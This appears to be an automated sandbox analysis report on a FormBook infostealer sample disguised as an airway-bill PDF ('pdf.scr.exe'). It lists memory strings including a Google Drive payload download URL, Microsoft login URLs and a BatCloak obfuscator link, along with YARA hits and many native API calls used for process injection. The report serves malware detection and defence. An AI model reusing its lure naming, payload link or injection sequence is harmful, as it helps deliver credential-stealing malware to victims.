                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.0000000000787000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.0000000000764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk1&export=download
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.0000000000764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk1&export=download6
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.000000000076E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com:443/download?id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk1&export=downlo
                      Source: proquota.exe, 00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: proquota.exe, 00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: proquota.exe, 00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: cmd.exe, 00000009.00000002.2427580879.0000000003111000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ch2sh/BatCloak
                      Source: proquota.exe, 00000012.00000002.3369025968.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/o
                      Source: proquota.exe, 00000012.00000002.3369025968.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: proquota.exe, 00000012.00000003.2967927181.0000000007660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                      Source: proquota.exe, 00000012.00000002.3369025968.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=
                      Source: proquota.exe, 00000012.00000002.3369025968.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                      Source: proquota.exe, 00000012.00000002.3369025968.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
                      Source: proquota.exe, 00000012.00000002.3369025968.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=
                      Source: proquota.exe, 00000012.00000002.3369025968.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: proquota.exe, 00000012.00000002.3369025968.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10336
                      Source: proquota.exe, 00000012.00000002.3369025968.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: proquota.exe, 00000012.00000002.3369025968.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: proquota.exe, 00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.6:49711 version: TLS 1.2
                      Source: Yara matchFile source: Process Memory Space: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe PID: 5016, type: MEMORYSTR

                      E-Banking Fraud

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 15.2.hdcleziT.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.hdcleziT.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.hdcleziT.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.hdcleziT.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.hdcleziT.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.hdcleziT.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000002.3370454633.0000000000AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3370291190.0000000000AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2806584419.000000001A250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2725067092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2805235368.0000000000650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3368003513.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2788912013.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2807095527.000000001D920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.3370452478.0000000002F00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2699018066.0000000024B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3371188324.0000000005980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2702788304.0000000024FD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B3824C NtReadVirtualMemory,0_2_02B3824C
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B384BC NtUnmapViewOfSection,0_2_02B384BC
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B3DAC4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_02B3DAC4
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B3DA3C RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02B3DA3C
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B3DBA8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02B3DBA8
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B38BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02B38BA8
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B379AC NtAllocateVirtualMemory,0_2_02B379AC
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B37CF8 NtWriteVirtualMemory,0_2_02B37CF8
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B38BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02B38BA6
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B379AA NtAllocateVirtualMemory,0_2_02B379AA
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B3D9E8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02B3D9E8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_0042CB13 NtClose,5_2_0042CB13
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_24CF2C70
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_24CF2DF0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2B60 NtClose,LdrInitializeThunk,5_2_24CF2B60
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF35C0 NtCreateMutant,LdrInitializeThunk,5_2_24CF35C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF4650 NtSuspendThread,5_2_24CF4650
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF4340 NtSetContextThread,5_2_24CF4340
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2CC0 NtQueryVirtualMemory,5_2_24CF2CC0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2CF0 NtOpenProcess,5_2_24CF2CF0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2CA0 NtQueryInformationToken,5_2_24CF2CA0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2C60 NtCreateKey,5_2_24CF2C60
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2C00 NtQueryInformationProcess,5_2_24CF2C00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2DD0 NtDelayExecution,5_2_24CF2DD0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2DB0 NtEnumerateKey,5_2_24CF2DB0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2D00 NtSetInformationFile,5_2_24CF2D00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2D10 NtMapViewOfSection,5_2_24CF2D10
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2D30 NtUnmapViewOfSection,5_2_24CF2D30
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2EE0 NtQueueApcThread,5_2_24CF2EE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2E80 NtReadVirtualMemory,5_2_24CF2E80
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2EA0 NtAdjustPrivilegesToken,5_2_24CF2EA0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2E30 NtWriteVirtualMemory,5_2_24CF2E30
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2FE0 NtCreateFile,5_2_24CF2FE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2F90 NtProtectVirtualMemory,5_2_24CF2F90
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2FA0 NtQuerySection,5_2_24CF2FA0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2FB0 NtResumeThread,5_2_24CF2FB0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2F60 NtCreateProcessEx,5_2_24CF2F60
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2F30 NtCreateSection,5_2_24CF2F30
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2AD0 NtReadFile,5_2_24CF2AD0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2AF0 NtWriteFile,5_2_24CF2AF0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2AB0 NtWaitForSingleObject,5_2_24CF2AB0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2BE0 NtQueryValueKey,5_2_24CF2BE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2BF0 NtAllocateVirtualMemory,5_2_24CF2BF0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2B80 NtQueryInformationFile,5_2_24CF2B80
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2BA0 NtEnumerateValueKey,5_2_24CF2BA0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF3090 NtSetValueKey,5_2_24CF3090
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF3010 NtOpenDirectoryObject,5_2_24CF3010
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF3D70 NtOpenThread,5_2_24CF3D70
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF3D10 NtOpenProcessToken,5_2_24CF3D10
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF39B0 NtGetContextThread,5_2_24CF39B0
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFCode function: 7_2_02AB824C NtReadVirtualMemory,7_2_02AB824C
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFCode function: 7_2_02AB84BC NtUnmapViewOfSection,7_2_02AB84BC
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFCode function: 7_2_02ABDAC4 NtCreateFile,NtWriteFile,NtClose,7_2_02ABDAC4
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFCode function: 7_2_02ABDA3C NtDeleteFile,7_2_02ABDA3C
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFCode function: 7_2_02AB8BA8 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,7_2_02AB8BA8
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFCode function: 7_2_02ABDBA8 NtOpenFile,NtReadFile,NtClose,7_2_02ABDBA8
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFCode function: 7_2_02AB79AC NtAllocateVirtualMemory,7_2_02AB79AC
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFCode function: 7_2_02AB7CF8 NtWriteVirtualMemory,7_2_02AB7CF8
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFCode function: 7_2_02AB8BA6 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,7_2_02AB8BA6
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFCode function: 7_2_02AB79AA NtAllocateVirtualMemory,7_2_02AB79AA
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFCode function: 7_2_02ABD9E8 NtDeleteFile,7_2_02ABD9E8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3435C0 NtCreateMutant,LdrInitializeThunk,11_2_1A3435C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342B60 NtClose,LdrInitializeThunk,11_2_1A342B60
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_1A342C70
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_1A342DF0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3439B0 NtGetContextThread,11_2_1A3439B0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A343D10 NtOpenProcessToken,11_2_1A343D10
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A343D70 NtOpenThread,11_2_1A343D70
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A343010 NtOpenDirectoryObject,11_2_1A343010
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A343090 NtSetValueKey,11_2_1A343090
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342AB0 NtWaitForSingleObject,11_2_1A342AB0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342AF0 NtWriteFile,11_2_1A342AF0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342AD0 NtReadFile,11_2_1A342AD0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342BA0 NtEnumerateValueKey,11_2_1A342BA0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342B80 NtQueryInformationFile,11_2_1A342B80
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342BF0 NtAllocateVirtualMemory,11_2_1A342BF0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342BE0 NtQueryValueKey,11_2_1A342BE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342E30 NtWriteVirtualMemory,11_2_1A342E30
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342EA0 NtAdjustPrivilegesToken,11_2_1A342EA0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342E80 NtReadVirtualMemory,11_2_1A342E80
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342EE0 NtQueueApcThread,11_2_1A342EE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342F30 NtCreateSection,11_2_1A342F30
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342F60 NtCreateProcessEx,11_2_1A342F60
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342FB0 NtResumeThread,11_2_1A342FB0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342FA0 NtQuerySection,11_2_1A342FA0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342F90 NtProtectVirtualMemory,11_2_1A342F90
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342FE0 NtCreateFile,11_2_1A342FE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342C00 NtQueryInformationProcess,11_2_1A342C00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342C60 NtCreateKey,11_2_1A342C60
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342CA0 NtQueryInformationToken,11_2_1A342CA0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342CF0 NtOpenProcess,11_2_1A342CF0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342CC0 NtQueryVirtualMemory,11_2_1A342CC0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342D30 NtUnmapViewOfSection,11_2_1A342D30
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342D10 NtMapViewOfSection,11_2_1A342D10
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342D00 NtSetInformationFile,11_2_1A342D00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342DB0 NtEnumerateKey,11_2_1A342DB0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A342DD0 NtDelayExecution,11_2_1A342DD0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A344340 NtSetContextThread,11_2_1A344340
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A344650 NtSuspendThread,11_2_1A344650
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B385D4 CreateProcessAsUserW,0_2_02B385D4
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B220C40_2_02B220C4
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B4D5960_2_02B4D596
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_004189A35_2_004189A3
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_004028705_2_00402870
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_004010E05_2_004010E0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_0042F1435_2_0042F143
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_0040496A5_2_0040496A
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_004101D35_2_004101D3
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_004032305_2_00403230
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_004012C05_2_004012C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_0040E3CA5_2_0040E3CA
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_0040E3D35_2_0040E3D3
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_004103F35_2_004103F3
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_00416B9E5_2_00416B9E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_00416BA35_2_00416BA3
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_0040E5185_2_0040E518
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_0040E5235_2_0040E523
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_004025B05_2_004025B0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D6E4F65_2_24D6E4F6
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D724465_2_24D72446
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D644205_2_24D64420
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D805915_2_24D80591
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC05355_2_24CC0535
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDC6E05_2_24CDC6E0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBC7C05_2_24CBC7C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE47505_2_24CE4750
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC07705_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D520005_2_24D52000
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D781CC5_2_24D781CC
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D801AA5_2_24D801AA
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D741A25_2_24D741A2
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D481585_2_24D48158
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB01005_2_24CB0100
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5A1185_2_24D5A118
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D402C05_2_24D402C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D602745_2_24D60274
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCE3F05_2_24CCE3F0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D803E65_2_24D803E6
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D7A3525_2_24D7A352
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB0CF25_2_24CB0CF2
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60CB55_2_24D60CB5
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0C005_2_24CC0C00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBADE05_2_24CBADE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CD8DBF5_2_24CD8DBF
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5CD1F5_2_24D5CD1F
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCAD005_2_24CCAD00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D7EEDB5_2_24D7EEDB
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D7CE935_2_24D7CE93
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CD2E905_2_24CD2E90
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0E595_2_24CC0E59
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D7EE265_2_24D7EE26
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB2FC85_2_24CB2FC8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCCFE05_2_24CCCFE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3EFA05_2_24D3EFA0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D34F405_2_24D34F40
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D62F305_2_24D62F30
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D02F285_2_24D02F28
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE0F305_2_24CE0F30
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEE8F05_2_24CEE8F0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CA68B85_2_24CA68B8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCA8405_2_24CCA840
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC28405_2_24CC2840
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC29A05_2_24CC29A0
